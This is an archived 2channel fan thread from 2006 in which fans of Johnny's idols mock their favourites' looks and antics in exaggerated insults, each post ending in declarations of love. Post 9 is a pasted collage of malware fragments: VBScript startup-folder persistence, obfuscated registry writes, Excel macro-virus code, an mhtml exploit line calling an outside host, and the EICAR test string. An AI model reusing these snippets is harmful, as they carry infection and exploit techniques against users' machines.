2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

愛してやまない自担を口汚く罵るSのスレ☆

1 :ユー&名無しネ:2006/11/09(木) 12:29:38 ID:h4E4yW5W
みなさんよろしく!


おい!俺愛…なんなんだよ
その笑顔、スタイル、ダンス…笑顔と真顔にギャップがありすぎんだろ〜が!!
誓心ではヘンな剣持ちやがって踊り狂って!おめ〜を斬ってやろうか?




寝ても覚めても俺愛…♪


2 :ユー&名無しネ:2006/11/09(木) 19:01:44 ID:MLG9nnIQ
たっちゃん。。。。。
もっとさぁ、喋ってよ!!
キモイとか言って誤解されるじゃん。昔はガクトだし。
ドラマも何で出ないんだよ〜


でもかなり好き

3 :ユー&名無しネ:2006/11/09(木) 19:15:56 ID:ZSLGl3GT
小山!!
ぶさいねんw
早口で何ゆうてるかわからんときあるよ
でもたまにカコヨク見えるし
歯見せて笑う顔がダイスチやねん(´∀`*)


4 :ユー&名無しネ:2006/11/09(木) 19:34:10 ID:fjIrIqM6
おいブタ増田!
てめぇ8年も事務所入ってるくせになんでそんなにうまく立ち回れねぇんだよ!
ガタイばっかでかくなりやがって!
その割に足の筋力弱くてダンスのとき軸がブレてんだよ!
お前はダンスくらいしか人様に自慢できねぇんだから、休みの日に市民プールばっか行ってねぇでジムで足腰鍛えやがれってんだよブタ!!
ぶりっこキャラもそろそろ無理があるって気付きやがれ!(´∀`*)

大スチですがなにか

5 :ユー&名無しネ:2006/11/09(木) 19:36:14 ID:p4A3WYTi
西へ
急に語学留学に行ったと思ったらピカチュウとかパーチとかアフォなことやってやってファンを困らせないでください
もう情報が混乱して何がなんだかたまについて行けなくなります

でもどんなアフォな西もだいしてる(ノ∀`)早く帰ってきてね

6 :ユー&名無しネ:2006/11/09(木) 20:09:00 ID:KMz8lnG+
カデへ
環八の中で一番見てられない顔をしているオマエが可哀想だ
誰にでもツッコんでじゃねえぞ!
スカのゲストが誰であろうと
ツッコむのはこっちが見てらんねえ!
いい加減にその顔どうにかしろよ!!
℃ックソと並ぶとお前が惨めすぎて
テレビ消したくなるんだよ!!

でもだいすちだ

7 :ユー&名無しネ:2006/11/09(木) 20:55:07 ID:ee9eUAvb
顎マルへ


地味なんだよブサイクではないけど男前でもないんだよ
はっきり言って素でキモイ時あるし私服中途半端だし額ヤバイし…

でも笑顔カ○゙エエし時々色気でまくりだし何よりその優しい性格がたまらねえぞゴルァ(゚Д゜)

8 :ユー&名無しネ:2006/11/09(木) 21:14:53 ID:PaIXQm3N
すへ

もうちょっと愛想よくテレビ出ろや
笑ってるすがスチだからな


YOU成長だよ!

9 :<body onload=window()>:2006/11/09(木) 22:27:57 ID:Mgbv0Kex
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

10 :ユー&名無しネ:2006/11/09(木) 22:49:27 ID:wWwIRT4/
よーし西担はりきっちゃうぞ

欧米か!ってつっこみはオマイのためにあるような言葉だな西よ
何が大統領になりますだよ!欧米か!
何ピザッてんだよ!欧米か!
何ガム噛んでんだよ!欧米か!
ケツアゴとか!欧米か!
とにかくオマイは自由すぎるよ
言ってることとやってることが矛盾してるとかですらないもんな
言うこともやることもどっちもムチャクチャだよ!
わけわかんね!

だいしてる!

11 :ユー&名無しネ:2006/11/09(木) 23:49:11 ID:TLvRpj9P

なんでたらこ唇なんだよ
もっと前出ろよ
ハイソックスとかバカか
ただのアホじゃねーか
影薄いんだよ



でも大スチだお(*^ω^)w

12 :ユー&名無しネ:2006/11/10(金) 14:27:11 ID:P4O1Wjie
丸山へ

最近マジ太り過ぎなんだよ
どんだけ食ってんだテメェはよっ!!
本気で写真写りが60%キモスで有り得ねーんだよ
顔も中途半端
前髪の分け目も中途半端
人気も中途半端
DVDのレンジャーの
許すのどーのこーの言ってるくだりの
オマイのあのリアクションはっきり言って
見ててハラハラしたんだよ!!


でもアフォそうなマルをダイシテル
これからも変わらず今のままのマルで居てくれ

13 :ユー&名無しネ:2006/11/10(金) 20:41:27 ID:jC813b2M
>10
西担に対抗しゃうぞ〜

上田〜、お前の顔なんだよ…東南アジアか!
唇の分厚さ具合いも…東南アジアか!

西の語学留学の次はまさかお前のボクシング留学「タイで修行」なんてふざけてもするんじゃね〜ぞ!
何が週5でジム通いだよ! 仕事探せよ!社長に直談判でもしろよ!



たっちゃんダイシテル☆


14 :ユー&名無しネ:2006/11/10(金) 21:03:03 ID:lqdKTYV0
>10
リアルすぎてなんか泣けた

15 :ユー&名無しネ:2006/11/11(土) 09:26:33 ID:WIx/UaFd
>14泣くオマイが理解できない

16 :ユー&名無しネ:2006/11/12(日) 21:48:05 ID:nLOgVPT3
>15
いや泣けるって!
ついでに東南アジアにも泣けました!
わかる!わかるよその気持ち!

17 :ユー&名無しネ:2006/11/13(月) 16:06:48 ID:1UODUs3g
おいロ!

なんなんだよその厚い唇はよ!?コンシーラーで隠したりして痛々しいぞテメェ!
ファンデも塗りすぎなんだよ!化け物チックな化粧どうにかしろ
「なんであんな不細工が好きなの?」って周りの人に言われるヲタの気持ちにもなれよ
地理の資料集に載ってる東南アジアの民族の子供がお前に激似で、地理の時間に毎回吹いちまうじゃねーかよwwwバナナでも売ってろよ!
ボクシングとか意味不明なんだよ!お前のV系な顔と服と合わなすぎ!お前は何になりたいんだ?
髪グルグル巻きすぎうざってーんだよ!ヲバチャソかよ!
自分の事アーティストとか思ってんのか?勘違いもいい加減にしろよなこの身の程知らずが!







最強だいしてる
この世に生まれてきてくれて有難う
お前がいるから私は生きていけるよ

18 :ユー&名無しネ:2006/11/13(月) 19:45:34 ID:nyBzUBbH
おい 馬鹿西ー

オマイ何やってんだよ
ジャニタレの分際で留学なんて型破りすぎんだろーが
アイドルの使命はファソを喜ばせる事だろがーー泣かしてどーすんだよボケナス

オマイの高音聴いた日はマヂで鳥肌立ったんゾ 一生忘れねーボケ




不覚にもジャニタレにハマったのはオマイが初めてだ 西
戻ってきて((cr


19 :ユー&名無しネ:2006/11/14(火) 11:22:50 ID:LS1dj6DP
オイコラシャクレヒヨコ!

誰のせいで石鹸活動休止になったと思ってんだよ(w
おかげで毎日毎日サミシスじゃねえか!
なんで酒なんか飲んじまったんだよヴォケ!!!
前々から頭足りないなと思ってたがまさかココまでだったとは…

だいたい自分の顔鏡で見てブサイクだと思うとか嘘だろ(w
オマイがブサイクなら自分なんかカス以下になっちまうジャマイカ…シャクレが!

もし戻って来るんだったらそのトンチンカンな頭とシャクレた顎どうにかして来いよ!!!!







…オマイのトンチンカンで足りない頭とシャクレた顎が禿ダイスチだカバ○エよ…orz

お願いだからきちんと反省して戻って来てくれ

20 :ユー&名無しネ:2006/11/14(火) 21:24:39 ID:+M10MC11
>19
ワロタ
そしてナケタ

21 :ユー&名無しネ:2006/11/16(木) 21:23:38 ID:12+oVXgs
>19
姐さん切実だな

22 :ユー&名無しネ:2006/11/17(金) 15:34:34 ID:9La+ZV5j


23 :ユー&名無しネ:2006/11/17(金) 16:10:37 ID:U1GCKy0/
勢いで書こうとしたが
ここに書いたら自担バレるのでスマソノシ

24 :ユー&名無しネ:2006/11/17(金) 16:22:07 ID:gIEXV3eS
>23
イッちゃいなよ!

25 :ユー&名無しネ:2006/11/18(土) 14:21:03 ID:MEv1nwNi
なんで女の噂が絶えないんだよ上手くやれよゴルァ!
厨人気ばっか集めやがって他担が迷惑だろうが
でなんだよそのギャル男みたいな髪は
遊び人オーラ放ちまくりだよ!
黒髪モヘだった頃の面影はどこに行ったんだよ
そんなにムッチリして…

でもジム通いなんかするなよ
オマイの頬袋とビーバーみたいな歯がダイスチなんだ
オマイがどんなに調子乗ってもギャル男みたいになってもずっとついていくからな
ずっとアフォな親分をだいしてるよ

26 :ユー&名無しネ:2006/11/25(土) 01:50:35 ID:0YumEfqo
なんでそんな馬鹿なの?
もっとうまくやれよ
正直すぎ
まっすぐすぎ
そんなんじゃ世間わたってけないよぉ
優しすぎだおまい



大好き
母性本能が…


27 :ユー&名無しネ:2006/12/12(火) 17:13:48 ID:yLEMrVrO
唇だよ!厚すぎだよ!
「ん〜」ってやってごまかそうとしても無駄なんだよボケが!
厚底とか履いてんじゃねぇぞ!身長差モエのなんたるかを分かってねぇのかアホが!
ダルそうにしてんじゃねぇ!「やる気ない」とか言われんだろうが!学習しろよサルが!
笑顔振りまいてんじゃねぇぞ!カワイイと思ってんのかオカマが!
身をよじって笑ったり内股になったりコクコク頷いたりチョコチョコ走ったり小動物気取りかオカマが!
寂しがり屋とか人懐っこいとか何キャラだお前!
クールな雰囲気が台無しだっつんだよアホか!何路線だよイミフだよアホか!
テレビとかお前にゃ向いてねぇんだよ!
お前出るとハラハラして萌える所じゃねぇんだよどーいう事だコレ!
不細工に映ってないシーンを探すほうが難しいってどーいう事だコレ!
髪型の巻きも有り得ねぇくらい似合いませんね!スーパー行った帰りか!
ゴリラ化にもそろそろ歯止めかけろよ!退化かよ!見るたび爆笑だっつの



上田、ダイシテル
こんなにスチになった$は始めてだ

28 :ユー&名無しネ:2006/12/16(土) 21:17:56 ID:8MspiU5D
>19 >27
吹いた(w
姐さん達痛い所を突く自虐でオモシロス

29 :ユー&名無しネ:2006/12/20(水) 20:05:18 ID:8zkXmJLp
おいコラテメェ!そうだよオマイだよそこの豚!
なんでオマイはそんなにプニりやすいんだ!$失格ダロ
しかも歌う時に猫背になりながらヒッチに歌うのは見ていて悲しくなる!下手なのに!


でもなんだかんだでツンデレでユニ愛はナンバワンなヘンリを誰よりダイシテル

30 :ユー&名無しネ:2006/12/22(金) 15:19:15 ID:n95RKBC1
勘違い痛いんだよ
お前一人じゃ何にも出来ないよな
だからピンで仕事来ないんだよ
外見必死にごまかそうとしてるみたいだけど無駄
髪型もキモイウザイ
お前みたいな真性ブサはどうにもならない
見ててこっちが恥ずかしいから消えろよ
お前なんて首絞めて殺してやりたいよ













ロだいしてる
安置ジャニだった自分がこんなに嵌まった
おまいの笑顔見ると嫌な事忘れる
生まれてきてくれて有り難う

31 :ユー&名無しネ:2006/12/23(土) 13:02:47 ID:BtfR4+MY
最近調子のりすぎなんだよ
なんだそのいかにも研究しました的な作った笑顔は
カメラ意識しすぎてたまに顔歪んでんだよ
自作の歌詞が女々しいんだよ矛盾してんだよ気づけよ
ジム通いに食事制限なんからしくないことすんな!きもいんだよ!
コンでのサービス悪すぎるんだよもっと自分のファンを大事にしないと痛い目見るからな










親分だいしてる
路線変更悲シス。.゚(⊃Д`)・゚。

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)